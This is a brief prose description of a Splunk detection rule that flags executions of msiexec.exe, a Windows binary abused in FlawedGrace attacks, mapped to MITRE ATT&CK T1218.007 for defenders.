The rule titled 'MSIExec.exe Execution' addresses the detection of unauthorized executions of the Windows system component msiexec.exe, which is commonly leveraged by threat actors to install malware while masquerading as a legitimate process. This behavior, particularly noted in FlawedGrace attacks, showcases how attackers can exploit system binaries to maintain persistence or carry out malicious activities without triggering standard security alerts. The detection logic utilizes Splunk to monitor endpoint data for any invocation of msiexec.exe, employing regex patterns to ensure accurate targeting of the process. It aggregates execution events, including timestamps, host information, user accounts, and parent process details, empowering security analysts to investigate potential threats effectively. The technique primarily falls under the defense-evasion tactic, specifically the use of system binaries as malicious proxies, aligning with the MITRE ATT&CK technique T1218.007. Through continuous monitoring of EDR logs, this rule plays a vital role in identifying and mitigating risks associated with compromised software installations.